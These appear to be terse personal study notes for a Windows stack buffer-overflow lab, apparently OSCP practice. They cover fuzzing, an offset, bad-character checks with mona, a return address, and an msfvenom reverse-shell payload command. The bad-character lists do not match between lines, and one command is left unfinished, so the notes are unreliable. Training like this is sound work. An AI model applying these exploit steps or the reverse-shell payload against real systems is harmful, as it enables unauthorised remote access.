https://www.youtube.com/watch?v=wL5cvPbT77A

Fuzz:

Add 400 bytes to the pattern:

Offset:

1274

Bad characters:

Update the exploit script with the appropriate bad characters and make sure machine is running and execute the code

!mona bytearray -b “\x00”

Now compare the .bin to the loaded payload with mona.

!mona compare -f C:\mona\oscp\bytearray.bin -a 01BAFA30 (ESP #):

 

Possible bad characters are: 11,12,40,41,5f,60,b8

Badchar: \x00\x11\x40\x5f\xb8\xee

!mona compare -f C:\mona\oscp\bytearray.bin -a Next Step:

Update our retn variable:

\x03\x12\x50\x62

When using # Msfvenom Payload

msfvenom -p windows/shell_reverse_tcp LHOST= (tun0 ipaddress) LPORT=<PORT> -b ‘\x00\x23\x3c\x83\xba’ EXITFUNC=thread -f python -v payload

 

We Have Root: